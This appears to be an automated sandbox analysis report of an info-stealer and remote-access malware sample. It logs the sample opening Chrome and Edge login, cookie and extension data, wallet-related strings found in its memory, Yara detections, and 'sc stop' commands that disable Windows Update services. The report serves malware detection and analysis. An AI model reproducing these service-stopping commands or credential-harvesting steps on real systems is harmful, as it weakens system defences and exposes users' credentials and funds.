                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\weoPNOytXa.tmp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\weoPNOytXa.tmp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Credentials\Chrome\Chrome Cookies.txt VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wpNXr.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB2C7A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6CEB2C7A0
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB46B50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6CEB46B50
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0036D076 GetVersionExW,5_2_0036D076
                                  Source: C:\ProgramData\Microsoft\hacn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000003.1878137948.00000235B9F86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000003.1878137948.00000235B9F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 7812, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI78122\rarreg.key, type: DROPPED
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                                  Source: Yara matchFile source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000003.1878137948.00000235B9F86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000003.1878137948.00000235B9F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 7812, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI78122\rarreg.key, type: DROPPED
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
